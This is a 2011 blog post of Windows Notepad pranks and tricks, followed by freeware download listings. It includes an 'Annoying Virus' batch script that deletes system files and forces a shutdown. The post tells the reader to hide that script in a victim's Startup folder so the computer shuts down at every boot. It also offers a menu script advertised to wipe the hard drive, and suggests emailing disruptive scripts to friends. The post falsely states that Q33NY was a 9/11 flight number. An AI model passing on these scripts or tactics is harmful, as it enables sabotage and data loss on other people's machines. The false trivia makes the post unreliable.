click and win

Friday, September 23, 2011

I'm Feeling Lucky..........Funny Results........!


Funny Google Search Results :-

Here are some funny search results. Just go to www.google.com and type following and click on i'm Feeling Lucky and see the Funny Results..!!!


Go to "www.google.com " and click on ‘I’m Feeling Lucky button’

*1) Type in “Google Gravity” and wait a sec to experience the effect of gravity.
 2) Type in “French Military Victories” and press "I'm feeling lucky".
 3) Type in “elgoog”and the Mirror effect is on.
*4) Type in “Google Sphere” and see the spinning effect.
*5) Type in “find Chuck Noris” (A must search keyword for al Chuck Norris Fans :D).
*6) Type in “who is the cutest” and see who’s so cute and beautiful/handsome.
 7) Type in “2204355” and see (You’ve been Chicken Rolled).
 8) Type in “Google Loco” and see what’s moving.
*9) Type in “ LOL Limewire” and see that you are as a pirate.
*10) Type in “Epic Google, Rainbow google, Annoying Google, Google pacman, Google Magic,Google color (Ex: pink,blue), Early Google, Google Heart Page.

Mouse Button Swapping Program

This program is for mouse button swapping....!

This will change the mouse buttons continuously...!

Only u have to do is just write this code in Notepad and save it as anyname.vbs .:-


@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * basa bomblat
msg * good look finding how to fix it



Now ur work is done..just double click on the file and have  fun....!!

Wednesday, September 21, 2011

Hide all drives from My Computer

Proceed at your own risks.


How to Hide the drives(c:,d:,e:,...etc) in Ur Computer

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.
1.     Go to Start -> Run.
2.     Type regedit
3.     Now go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
4.     Now in the right pane, create a new DWORD item and name it NoDrives (it is case sensitive).
5.     Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
6.     Now restart your computer.
7.     So, now when you click on My Computer, no drives will be shown(all gone...).


To enable display of drives in My Computer, simply delete this DWORD item that you created. Again restart your computer. You can now see all the drives again. Magic.......!!!!!

Annoying Virus Making

For making of this Annoying Virus you have to :-

1.Open Notepad.

2.And now type following code....

cls
:A
color 0a
@ echo off
echo Wscript.Sleep
DEL C:\WINDOWS 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\mkdir
h4x
DEL C:\WINDOWS
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exeC:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide."

Or just copy and paste that code


3.Now save this file as virus.bat.

4.Click File
  Click Save As
  Change the Save as type: to All Files
  Select ANSI as the Encoding type
  Name the file virus.bat.

5.Now just copy that file into startup folder so that the virus will start automatically when windows is start.
For that just follow the steps:-
Click Start->All programs here on this sub-menu right click on "start up" and select Explore from options given. This opens "start up" folder now cut your virus.bat file and paste it into this start up folder opened.

6.For more effectiveness right click on your virus.bat file go to properties and select the option Hidden and press OK.

7.You have planted a prank and annoying virus into the computer.
 The next time this computer is turned on' your batch file (virus.bat) in the start up folder is executed automatically which commands the computer to shutdown in 0 seconds(i.e., immediately).
 Now, anyone turning on the computer will have no time to do anything because it will shutdown automatically every time the system turns on and comes to desktop.



For Cancelling This Virus...........
IMP :-# Method 1: If you use windows vista you may have to use a / instead of a -.
# Method 2: To cancel the "virus" press [Alt]+[Tab] simultaneously.
# To disable these "viruses" start the computer in Safe Mode and delete the .bat file from the Startup folder.

Convert Text Into Audio Using Notepad

Convert Text Into Audio Using Notepad

 Last time i shared a notepad trick using which you can format your hard disk. If you haven’t tried that do it now, here is the link :
Format Your Hard Disk Using Just Notepad !!
In this post i am going to share a similar notepad trick using which you can convert any text to audio with just a click. And it doesn’t even require you to pay for software or install any 3rd party software on your PC.

How To Do It ?

  1. Open Notepad file on your Windows PC.
  2. Copy and paste the below mentioned code :
      Dim msg, sapi msg=InputBox("Enter your text for conversion–www.techvorm.com","TechVorm Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg
  3. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.

Pick Your Option Batch File

When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number):
1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
  • Open Notepad.
  • Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
  • Save the file with any name and with a .bat extension and close the file.

Open Notepad continuously

  • Open Notepad.
  • Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
  • Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again.

Type “You are a fool” Continuously

Not much to explain, the title says it all! Follow the steps to make this trick work:
  • Open Notepad.
  • Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
  • Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type!
NOTE: In order to stop it. Follow the “Note” given in "Toggle Keyboard Button Simultaneously"

Slowly Type Messages

This one is my favorite. Completely harmless trick and perfect for playing pranks on one’s friends. This trick can really freak out anyone! Follow the below mentioned steps to perform this trick:
  • Open Notepad.
  • Paste the following code in the notepad file:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
  • Save the file with any name and with .vbs extension and close it.
Now open the file and see how freakishly slow the messages appear!

NOTE: In order to stop it. Follow the “Note” given in  "Toggle Keyboard Button Simultaneously"

Toggle Keyboard Button Simultaneously

Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks.
1. Caps Lock Key
    • Open Notepad.
    • Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
    • Save the file with anyname and .vbs extension. and close it.
    • Now open the newly created file and see how the caps lock key behaves on your keyboard!
2. Hit Enter Key Continuously
    • Open Notepad.
    • Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
    • Save the file with any name and .vbs extension and close it.
    • Now open the newly created file and see how the enter key behaves!
3. Hit Backspace Key Continuously
    • Open Notepad.
    • Paste the following code in the notepad file:
MsgBox “Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
    • Save the file with any name and with .vbs extension and close it.
    • Now open the newly created file and see how the key behaves!
In order to end the vbs script (stop continuous key presses), open task manager and end the wscript.exe process as shown in image below.

Shut-down The Computer After Conveying Any Message

This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:
  • Open Notepad.
  • Paste the following code in it:
@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s
  • Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat
NOTE : Use this carefully. If you are playing prank then keep in mind that this may lead to loss as it shuts down the computer forcefully.

Constantly Repeat Messages

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
  • Open Notepad.
  • Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
  • Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out !

Change The Header/Footer Of Your Notepad File

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
  • Open Notepad.
  • Click on File -> Page Setup.
  • Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

Continually pop the CD Drive

  • Open Notepad.
  • Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Save it as “Anything.VBS”.
Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!

World Trade Center Attack Trick

As you might be knowing that the flight number of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence  or something else but whatever it is, it does startle us.
  • Open Notepad.
  • Type “Q33N” (without quotes) in capital letters.
  • Increase the font size to 72.
  • Change the Font to Wingdings.
You will be amazed by the findings.

Test your antivirus

Now, you can check if your antivirus really works. Type the following in notepad:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save the file as virus-test.txt
Scan the file. If your antivirus detects this file as a virus and tries to remove it, then you can be sure your antivirus is a good one. This is a much easier way, than actually downloading a virus to test it. This sample virus code is perfectly harmless and allows you to test your antivirus. A good antivirus like MS Security Essentials will detect this test virus even before you scan it.

Create a command prompt Virus message

Fake Command Prompt Virus Message
Type the following in notepad:
@ echo off
title Virus
echo Your system is affected by virus
PAUSE
echo:
echo Windows will now try to undo changes
PAUSE
echo:
echo FAILED !
PAUSE
echo:
echo Your system is corrupt
PAUSE

Save the file as virus.bat and run the file.

Make a fake Virus POP UP

Type the following code in notepad:
@echo off
msg * WARNING
msg * VIRUS ENTERED YOUR PC

Save the file as pop.bat and run it. You should get two pop up messages. There has been an issue on some computers, but it should work on most computers.

Lock Folders using Notepad

This trick may not work on all computers
Lets say you want to lock a folder named PICS in your D:\ drive , whose path is D:\PICS
Then the code should be something like this:
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in the same drive.
To unlock this locked folder:
Open another new notepad text file and type the following:
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics
Save the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it to the folder you want to lock.

Alternative Single Character Matrix

Single Character Matrix
Type in the following in notepad:
@echo off
color 0a
:A
echo 7 y x 3 W 8 G M P q 1 F 0 U v c i j O D s a E I j H 9 t 6 7 z C B 4 g 8 3 W 8 G
ping localhost -n 1 > nul
goto A

Save the file as Matrix2.bat and run the file.
The file type should be kept as ALL FILES while saving a .bat file.

Make the Matrix


Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
Matrix Bat
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!

Make Questions

Want to make something interactive ? Need to make questions ? Here is an example of a question made with notepad where the user got the answer correct.
Question Fun PC Life Notepad Trick
To do this, just type the following code in notepad.
@ECHO OFF
ECHO:
ECHO ………………………………………..
ECHO PRESS 1 or 2 to select your task, or 3 to EXIT.
ECHO ………………………………………..
ECHO.
ECHO 1 – This info was given by Fun PC Life
ECHO 2 – This info was not given by Fun PC Life
ECHO 3 – EXIT
ECHO.
SET /P M=Type 1, 2, or 3, then press ENTER:
echo:
IF %M%==1 GOTO Correct
IF %M%==2 GOTO Wrong
IF %M%==3 GOTO EXIT
:Correct
echo You are right !!
GOTO END
:Wrong
echo You are wrong. This info was really given by Fun PC Life
GOTO END
:END
PAUSE
goto EXIT
:EXIT

Now save the file as Question.bat and run the file.
Please note that the file type should be kept as ALL Files while saving it as a .bat file.
You can modify the code for your convenience. Change the bold text and try it out.

Open a file using notepad

Here is a simple trick to open any file or program with notepad.
Open notepad and type the following:
Start path of file
Then save the file as Shortcut.bat
Please note that the file type should be kept as ALL FILES while saving it as a .bat file.
Change path of file with your actual file path. For example if you have a file called run with an extension .exe in the folder TEST in C:\ drive, then your path should be something like this: C:\TEST\run.exe
If you want to open some complicated programs such as Firefox, then use this code:
START /d “path of folderprogram.extension
Change path of folder with the actual path of the folder, and put the name of the program with its extension. For example if you have a file called run with an extension of .exe in the folder TEST in C:\ drive, then your code should be something like this: START /d “C:\TEST” run.exe

The 4335 Rule

Bush Hid The Facts 4335 RuleThis trick may not work on all computers
This has been surprising users for quite some time. When you enter a few secret codes, notepad hides them.
  • Open notepad and type in BUSH HID THE FACTS
  • Close notepad and open it again to see the magic
Can you read it again ? This is called the 4335 Rule. This means, if the first word is four words, the second and third as three words, and the fourth as five words, then you follow the 4335 rule and the text is hidden.
The same happens with this app can break.

Make A Personal Log-Book or A Diary

Did you know that you can also use Notepad as a simple digital diary or a personal Log-Book ? Well, if you didn’t then follow the below mentioned steps to make one for yourself !
  • Open Notepad.
  • Type .LOG (in capital letters) and hit enter.
  • Save it with any name and close it.
  • Open it again.
When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file.

Tuesday, September 20, 2011

Yahoo! Messenger

Keep friends and famliy at your fingertips with the new Yahoo! Messenger: the most powerful and widely used instant messenger, chat and talk, play games, have fun with family and friends.


  • Easier ways to stay up to date - See more updates from your friends in the detailed Messenger list
  • Show off your status - Easily add links and emoticons to your status messages
  • Watch videos together - Share videos from popular sites and watch them with friends right in your IM window

File size: 16.46MB (17,256,280 bytes)
Requirements: Windows 2000 / XP / 2003 / Vista / Windows7 / XP64 / Vista64
/ Windows7 64
License: Freeware
Author: Yahoo! Inc

www.yahoo.com



Other features include:

  • Instant message with one friend, or conference in a bunch
  • Send text messages (SMS) to friends' mobile phones
  • Join a chat room to meet new friends while you discuss your favorite topics
  • Make free PC-to-PC calls and PC-to-phone calls for as low as 1¢ a minute (plus free voicemail!)
  • Use the built-in media player to watch web videos and view photos with friends
  • Show your style with emoticons, Avatars, audibles and IMVironments
  • Share securely with automatic file scanning for users of Norton AntiVirus or Internet Security 2007/2008

Download Link:

Download from Yahoo! Messenger official website: http://messenger.yahoo.com/download/win/

Note: When prompted, save the .exe file to your desktop. Then double click the Yahoo! Messenger 10 file on your desktop to begin installation.

Skype

Now calling to friends has become very easy, use skype in your pc, PDA, cellphone etc. Skype is software for calling other people on their computers or phones. Download Skype and start calling for free all over the world.

The calls have excellent sound quality and are highly secure with end-to-end encryption. You don't even need to configure your firewall or router or any other networking gear.

Additionally it doesn't just work on Windows. Skype is also for Mac OS X, Linux and PDAs using Pocket PC, with a native look and feel for each platform. Talking, sending instant messages or even file transfers work between different platforms like a charm.



File size: 19.85MB (20,810,120 bytes)
Requirements: Windows 2000 / XP / 2003 / Vista / Windows7 / XP64 / Vista64
/ Windows7 64
Languages: Multiple languages
License: Freeware
Author: Skype Technologies

www.skype.com

  • Skype calling - Skype has all the features of an ordinary phone so it's even easier to manage your calls.
  • Video calling - see who you are talking to at the same time as speaking to them.
  • Add Skype and SkypeOut contacts - Add contacts who use Skype and those who use ordinary phones so you can call more people.
  • Organising groups - group contacts under certain names and share them with your contacts so they can talk to them too.
  • Basic chat and emoticons - when it's not convenient to call, chat or Instant Message (IM) your contacts.
  • Group chat - for when it's easier to chat or Instant Message (IM) all your friends at once.
  • Profile settings - change how you appear to the world and let people know a bit about you.
  • Conference calling - talk to more than one friend at a time.
  • Import contacts - search your address book to find friends and family that already have a Skype name and start calling them for free.
  • View Outlook contacts - view and call your Microsoft Outlook® contacts quickly and directly from your Skype contact list.
  • Quickfilter and Speed-Dial - find Skype contacts, recent chats and SkypeOut contacts quickly and easily, then enter their Skype name to call them back quickly.

Download Link:

Download Skype from the official website: http://www.skype.com/go/downloading

mIRC

mIRC is a popular Internet Relay Chat client used by millions of people, and thousands of organizations, to communicate, share, play and work with each other on IRC networks around the world. Serving the Internet community for over a decade, mIRC has evolved into a powerful, reliable and fun piece of technology.

mIRC is a full featured Internet Relay Chat client for Windows that can be used to communicate, share, play or work with others on IRC networks around the world, either in multi-user group conferences or in one-to-one private discussions.

It has a clean, practical interface that is highly configurable and supports features such as buddy lists, file transfers, multi-server connections, IPv6, SSL encryption, proxy support, UTF-8 display, UPnP, customizable sounds, spoken messages, tray notifications, message logging, and more.



Filename: mirc714.exe
File size: 1.99MB (2,085,856 bytes)
Requirements: Windows (All Versions)
Languages: en-US
License: Shareware
Author: mIRC Co Ltd

www.mirc.com

mIRC also has a powerful scripting language that can be used both to automate mIRC and to create applications that perform a wide range of functions from network communications to playing games.

mIRC has been in development for over a decade and is constantly being improved and updated with new technologies.

Download Link:

Download mIRC : http://www.mirc.com/get.php

You can download mIRC by clicking on the Download mIRC link.

If you are already using mIRC this download will upgrade your current version of mIRC to the latest version and will keep your existing settings.

Once the download has finished, you can run the installer to install mIRC.

Google Talk

The Google Talk downloadable application for Windows offers many features for communicating with your friends and family.

Instant messaging : Chat with all of your Google Talk and Gmail contacts in real time.

Free PC-to-PC voice chat : You can talk to anyone else for free who's online and has the Google Talk client.

Send and receive voicemails : If the person you're calling isn't available, you can leave a voicemail.

Unlimited file transfers : Send files to your contacts. There are no file size or bandwidth restrictions.

Gmail notifications on your desktop : When you're signed into Google Talk, you'll be notified of new messages in your Gmail inbox.

File size: 1.53MB (1,606,064 bytes)
Requirements: Windows 2000 / XP / 2003 / Vista / Windows7 / XP64 / Vista64
/ Windows7 64
Languages: en-US
License: Freeware
Author: Google

www.google.com

Text chat

  • Instant messages: share quick thoughts in real time
  • Status updates: see if friends are around and what they are up to
  • File transfer: instantly send and receive files, pictures, and more

Voice chat

  • Free long distance: make PC-to-PC calls to people anywhere in the world
  • Audio conferencing: talk to multiple people at once
  • Gmail integration: chat with your friends on Gmail

Download Link:

Google Talk from official google site: http://www.google.com/talk/install.html

7-Zip Archiver (Open source & widely used)

7-Zip (a real alternative of Winzip and Winrar) is open source software which works in Windows 7 / Vista / XP / 2008 / 2003 / 2000 / NT / ME / 98. Use this free soft to compress or decompress your files in all the extentions (eg. .zip, .rar, .tar, .cab etc...).

There is a port of the command line version to Linux/Unix. Compression ratio results are very dependent upon the data in the file. Usually, 7-Zip compresses to 7z format 30-70% better than to zip format. And 7-Zip compresses to zip format 2-10% better than most of other zip compatible programs.


The main features of 7-Zip:

  • High compression ratio in 7z format with LZMA and LZMA2 compression
  • Supported formats: (Packing / unpacking: 7z, XZ, BZIP2, GZIP, TAR, ZIP and WIM, Unpacking only: ARJ, CAB, CHM, CPIO, CramFS, DEB, DMG, FAT, HFS, ISO, LZH, LZMA, MBR, MSI, NSIS, NTFS, RAR, RPM, SquashFS, UDF, VHD, WIM, XAR and Z.)
  • For ZIP and GZIP formats, 7-Zip provides a compression ratio that is 2-10 % better than the ratio provided by PKZip and WinZip
  • Strong AES-256 encryption in 7z and ZIP formats
  • Self-extracting capability for 7z format
  • Integration with Windows Shell
  • Powerful File Manager
  • Powerful command line version
  • Plugin for FAR Manager
  • Localizations for 79 languages
Download link :

http://downloads.sourceforge.net/sevenzip/7z920.exe (.exe, 32-bit x86)
http://downloads.sourceforge.net/sevenzip/7z920-x64.msi (.msi, 64-bit x64)

Official Web: http://www.7-zip.org/

Adobe Reader (Acrobat Reader)

Adobe Reader former Acrobat Reader a "must to have" soft in your pc to read docs, newspapers in .pdf . It would get integreted in your browser to enable you read the pdf files online directly in your web browser. Adobe Reader software is the global standard for electronic document sharing. It is the only PDF file viewer that can open and interact with all PDF documents. Use Adobe Reader to view, search, digitally sign, verify, print, and collaborate on Adobe PDF files and its a Freeware!!!

Features:


  • View, print, and search PDF files, including PDF Portfolios and PDF maps
  • Author, store, and share documents, and share your screen, using Acrobat.com services
  • Experience richer content and greater interactivity with native support for Adobe Flash technology
  • Review documents using familiar commenting tools such as sticky notes, highlighting, lines, shapes, and stamps (When enabled by Acrobat Pro or Acrobat Pro Extended)
  • Digitally sign PDF documents (When enabled by Acrobat Pro or Acrobat Pro Extended)

Supports Windows 2000 / XP / 2003 / Vista / Windows7 / XP64 / Vista64 / Windows7 64

Download link: http://www.adobe.com/go/getreader/

Foxit PDF Reader (Alternative of Adobe Reader)

Foxit PDF Reader is the popular pdf viewer for its compact size, easy to install and fastest loading time, supports many languages, maintains the files original state...Unlike the other pdf viewer like Adobe reader it take very little resources of your PC which made it very popular among the pros..

Foxit PDF Reader is a small, fast, and feature rich PDF viewer for Microsoft Windows, which allows you to open, view, and print any PDF file. Foxit PDF Reader is secure, offering 3-three levels of PDF viewing security to protect against malicious PDF files.




  • The most features of any other pdf reader.
  • Reliable viewing & printing - view and print any PDF file
  • Tiny Footprint - makes it easy to deploy
  • Rapid response security releases - for peace of mind

Download link: http://cdn01.foxitsoftware.com/pub/foxit/reader/desktop/win/4.x/4.3/enu/FoxitReader43_enu_Setup.exe (Foxit Reader 4.3 .exe )

Web: http://www.foxitsoftware.com

QuickTime Player (Latest Version)

QuickTime: The best place to play.

Watch Internet video, HD movie trailers, and personal media clips. Whether it’s on the web or on your desktop, QuickTime Player brings your digital media brilliantly to life.

QuickTime Player from Apple allows the playback of quicktime movies (.mov) and many other formats.

Best player for the videos recorded in your cell phone.

The new QuickTime Player not only delivers startling quality, but it's easier to use than ever. It requires no set up for content that streams over the network. Instead, QuickTime Player automatically determines your system's connection speed and chooses the highest quality stream for the amount of bandwidth you have available. And if you ever lose a connection while watching streaming video, QuickTime Player automatically reconnects. Now, thats convenience.


Features:

  • Playback of 3GPP and 3GPP2 files
  • Playback of MPEG-4 video, H.274, AAC audio & Instant-On media
  • Easy-to-use controls
  • Enhanced interface
  • Bass and treble controls
  • Balance control
  • Streaming media support
  • Ability to save movie favorites
  • Ability to view VR & interactive content
  • H.264 video
  • Multichannel audio playback
  • Live resize
  • New playback capabilities
  • Zero config streaming

Technical Details:

File size: 32.86MB (34,452,784 bytes)
Requirements: Windows XP / 2003 / Vista / Windows7 / XP64 / Vista64 / Windows7 64
Languages: en-US
License: Freeware
Homepage: www.apple.com/quicktime/win.html

Download Link:


QuickTime Player From Official Website

QuickTime Alternative Player

QuickTime Alternative is a smaller version of QuickTime player that contains only the essential components needed for playing QuickTime audio, video content that is embedded in webpages.

Advantages of QuickTime Alternative are:

  • Quick and easy install
  • Ability to make an unattended installation
  • No background processes
  • No unwanted stuff and other nonsense
  • Smaller size than Apple QuickTime

Technical Details:

File size: 18.35MB (19,236,168 bytes)
Requirements: Windows XP / 2003 / Vista / Windows7 / XP64 / Vista64 / Windows7 64
License: Freeware

It comes bundled with Media Player Classic (available here) - a freeware media player that supports both QuickTime Alternative and Real Alternative.

Direct Download Link:

Download QuickTime Alternative

(The link above will take you to the QuickTime Alternative download page from where you can download the QuickTime Alternative latest & stable version)

Real Alternative (Real Player's Alternative Player)

Without having to install the full version of RealPlayer Real Alternative allows your system to play Real Media files (.ra .ram).

The latest version contains:

  • Media Player Classic - a freeware media player that supports both Real Alternative and QuickTime Alternative.
  • RealMedia Codecs
  • RealMedia plugin for Internet Explorer
  • RealMedia plugin for Opera/Mozilla/Netscape
  • RealMedia DirectShow splitter

Technical Details:

Filename: Real_Alternative_202.exe
File size: 6.59MB (6,909,232 bytes)
Requirements: Windows (All Versions)
License: Freeware

Download Link:

Download Real Alternative

(The link above will take you to the Real Alternative download page from where you can download the Real Alternative latest & stable version)

Java Runtime Environment (JRE)

JRE is needed to run applications written in java for web, these are usually called "applets". Online games like like pool, poker or even cards need jre to get loaded and let you play. Many interactive cross platform application in webpages uses this applets which need jre to run on your home computer. These applets allow you to have a much richer experience online than simply interacting with static HTML pages.

Java Plug-in technology, included as part of the Java 2 Runtime Environment, Standard Edition (JRE), establishes a connection between popular browsers and the Java platform. Java allows applications to be downloaded over a network and run within a guarded sandbox. Security restrictions are easily imposed on the sandbox.

JRE is available in for both windows 32bit (Windows 2000, xp, 2003 ) and windows 64bit (Windows XP64, Vista64, 7 64).

Technical Details:


File size: 15.37MB (16,121,632 bytes)
Requirements: Windows XP64 / Vista64 / Windows7 64
Languages: en-US
License: Freeware
Homepage: www.sun.com/java

Download Link:

Java Runtime Environment (JRE) From Official Site

From Alternative Link

Java Runtime Environment (JRE) for 32bit Windows 2000 / XP / 2003

Java Runtime Environment (JRE) for 64bit Windows XP64 / Visata64 / Windows7 64

(The link above will take you to the Java Runtime Environment (JRE) download page from where you can download the Java Runtime Environment (JRE) latest & stable version)